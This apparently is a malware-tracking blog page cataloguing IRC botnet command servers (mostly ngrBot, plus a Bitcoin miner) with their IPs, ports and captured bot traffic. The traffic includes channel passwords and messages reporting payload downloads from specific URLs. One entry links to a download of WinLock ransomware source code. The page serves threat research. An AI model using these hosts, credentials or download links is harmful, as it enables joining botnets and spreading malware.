Resolved : [juegalon.com] To [193.107.16.75]
Remote Host Port Number
173.208.131.234 80
199.15.234.7 80
65.60.49.28 80
193.107.16.75 1863
PASS ngrBot
NICK n{US|XPa}knloiig
USER knloiig 0 0 :knloiig
JOIN #rjr RjR
PRIVMSG #rjr :[DNS]: Blocked 0 domain(s) – Redirected 8 domain(s)
PRIVMSG #rjr :[d=”http://173.208.131.234/~dalepapi/ngr18.exe” s=”158208 bytes”] Updated bot file “C:\Documents and Settings\UserName\Application Data\Gcxaxg.exe” – Download retries: 0
kkk.hi5fotos.info(aspergillus mod hosted in Taiwan Taoyuan Taoyuan County Education Network Center)
Resolved : [kkk.hi5fotos.info] To [163.30.129.25]
Resolved : [kkk.hi5fotos.info] To [83.169.40.209]
Resolved : [kkk.hi5fotos.info] To [58.19.130.52]
Remote Host Port Number
163.30.129.25 4042
195.122.131.8 80
89.200.143.50 80
NICK new[USA|XP|COMPUTERNAME]pdnhwod
USER hh “” “lol” :hh
JOIN #biznew#
PONG 422
PRIVMSG #boss :[d=”http://goo.gl/kg5QG”] Error downloading file [e=”12039″]
NICK n{US|XPa}cgveoja
USER cgveoja 0 0 :cgveoja
JOIN #boss ngrBot
JOIN #US
xxxisniperixxx.info(irc bot hosted in United States Willowbrook Psinet Inc)
Remote Host Port Number
154.35.64.119 9425
JOIN #TvT wiggernet
PRIVMSG #Info : 9Main 9>>-
219.148.138.84(ngrBot hosted in China Hebei Chinanet Hebei Province Network)
Resolved : [herbal-roidz.com] To [219.148.138.84]
Remote Host Port Number
199.15.234.7 80
70.38.98.236 80
70.38.98.239 80
219.148.138.84 5101
PASS hax0r
PRIVMSG #ngme :[d=”http://img105.herosh.com/2011/07/09/982279045.gif” s=”19432 bytes”] Executed file “C:\Documents and Settings\UserName\Application Data\1.tmp” – Download retries: 0
* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://img102.herosh.com/2011/07/09/166578640.gif
72.20.30.105(irc botnet hosted in United States Staminus Communications)
Remote Host Port Number
72.20.30.105 6667
NICK NEW[XX][XP]5576881409
USER 5576 “” “TsGh” :5576
MODE NEW[XX][XP]5576881409 -d
JOIN ##released2##
PONG :irc.priv8net.com
hosting infos: http://whois.domaintools.com/72.20.30.105
91.98.146.3(irc botnet hosted in Iran, Islamic Republic Of Tehran Pars Online)
Remote Host Port Number
91.98.146.3 6667
NICK Ebeling381
USER qugif 0 0 :Ebeling381
USERHOST Ebeling381
MODE Ebeling381 -x+i
JOIN ##wtf slut
PRIVMSG ##wtf : 8,1-SC@N- Random Port Scan started on 192.168.x.x:135 with a delay of 5 seconds for 0 minutes using 400 threads.
PONG :B3E9DE16
hosting infos: http://whois.domaintools.com/91.98.146.3
Trojan Ransom (WinLock) Source Code
From Russia with love, another terrible malware. More info about this shit here: http://www.google.fr/search?hl=fr&q=Trojan+Ransom+%28WinLock%29++&meta= This version is coded in Delphi. Download: http://adf.ly/2NFYe
72.20.30.70(ngrBot hosted in United States Staminus Communications)
Remote Host Port Number
199.15.234.7 80
59.120.20.43 80
72.20.30.70 7475
PASS ngrBot
NICK n{US|XPa}obsduin
USER obsduin 0 0 :obsduin
JOIN ##cybercenter## ngrBot
JOIN #US
PRIVMSG ##cybercenter## :[DNS]: Blocked 0 domain(s) – Redirected 24 domain(s)
hosting infos: http://whois.domaintools.com/72.20.30.70
x.miners.in(Silent Bitcoin Miner)
Resolved : [x.miners.in] To [66.228.53.52]
Resolved : [x.miners.in] To [66.228.53.5]
Resolved : [x.miners.in] To [66.228.53.56]
Resolved : [x.miners.in] To [66.228.53.55]
Resolved : [x.miners.in] To [173.255.204.19]
Resolved : [x.miners.in] To [96.126.112.223]
Resolved : [x.miners.in] To [96.126.112.23]
Resolved : [x.miners.in] To [173.255.202.228]
ping -n 15 127.0.0.1
taskkill /f /im cgminer.exe
taskkill /f /im svchoost.exe
taskkill /f /im
Sabukenke.com(ngrBot hosted in Germany Rapidswitch Ltd)
Resolved : [Sabukenke.com] To [78.129.229.120]
Remote Host Port Number
199.115.229.186 80
199.15.234.7 80
78.129.229.120 7777
PASS laekin0505x
NICK n{US|XPa}zcmlqxw
USER zcmlqxw 0 0 :zcmlqxw
JOIN #totalrenovation2011 ngrBot
PRIVMSG #totalrenovation2011 :[d=”http://199.115.229.186/~cirrus13/1100New.exe” s=”167936 bytes”] Updated bot file “C:\Documents and Settings\UserName\Application Data\Mcxaxm.exe” – Download retries: 0
hosting infos: http://whois.domaintools.com/78.129.229.120